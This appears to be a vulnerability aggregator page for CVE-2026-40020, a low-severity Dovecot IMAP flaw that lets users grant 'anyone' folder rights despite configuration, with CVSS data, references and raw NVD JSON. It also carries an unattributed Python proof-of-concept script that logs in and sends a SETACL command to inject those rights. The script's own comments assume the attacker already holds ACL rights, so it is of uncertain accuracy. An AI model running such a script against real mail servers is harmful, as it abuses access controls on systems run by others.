CVE-2026-40020

Description

Attacker can use the IMAP SETACL command to inject the anyone permission to user's dovecot-acl file even if imap_acl_allow_anyone=no. This causes folders to be spammed to all users. The impact is limited to being able to spam folders to other users, no unexpected access is gained. Install to fixed version. No publicly available exploits are known.

CVSS Details

CVSS Score

3.1

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Dovecot (具体受影响版本请参考官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import imaplib # Exploit Title: Dovecot IMAP SETACL Permission Bypass (CVE-2026-40020) # Description: Inject 'anyone' permission into user's ACL file even if imap_acl_allow_anyone=no. IMAP_SERVER = 'target.example.com' IMAP_PORT = 143 ATTACKER_USER = '[email protected]' ATTACKER_PASS = 'password' VICTIM_FOLDER = 'INBOX.SpamFolder' try: # 1. Connect to the IMAP server client = imaplib.IMAP4(IMAP_SERVER, IMAP_PORT) # 2. Login with low-privileged user client.login(ATTACKER_USER, ATTACKER_PASS) print(f"[*] Logged in as {ATTACKER_USER}") # 3. Select the victim's folder (if attacker has access to modify ACL) # Note: In some configurations, attacker might need to create a folder or have specific shared folder access. # This PoC assumes the attacker has the right to modify ACL of the target folder. # 4. Exploit: Inject 'anyone' permission using SETACL # The vulnerability allows setting 'anyone' rights despite the config restriction. # 'lrs' stands for lookup, read, and seen (keep mail marked seen). acl_command = f'SETACL "{VICTIM_FOLDER}" anyone lrs' # Using raw IMAP command via imaplib typ, data = client._simple_command('SETACL', VICTIM_FOLDER, 'anyone', 'lrs') if typ == 'OK': print(f"[+] Successfully injected 'anyone' permission to {VICTIM_FOLDER}") print(f"[+] The folder is now accessible/spammable by all users.") else: print(f"[-] Failed to inject permission. Server response: {data}") client.logout() except Exception as e: print(f"[!] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40020
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40020
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40020/
[4] VulDB https://vuldb.com/cve/CVE-2026-40020
[5] https://documentation.open-xchange.com/dovecot/security/advisories/csaf/2026/oxdc-adv-2026-0002.json

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40020", "sourceIdentifier": "[email protected]", "published": "2026-05-12T14:17:03.687", "lastModified": "2026-05-12T15:08:22.857", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Attacker can use the IMAP SETACL command to inject the anyone permission to user's dovecot-acl file even if imap_acl_allow_anyone=no. This causes folders to be spammed to all users. The impact is limited to being able to spam folders to other users, no unexpected access is gained. Install to fixed version. No publicly available exploits are known."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://documentation.open-xchange.com/dovecot/security/advisories/csaf/2026/oxdc-adv-2026-0002.json", "source": "[email protected]"}]}}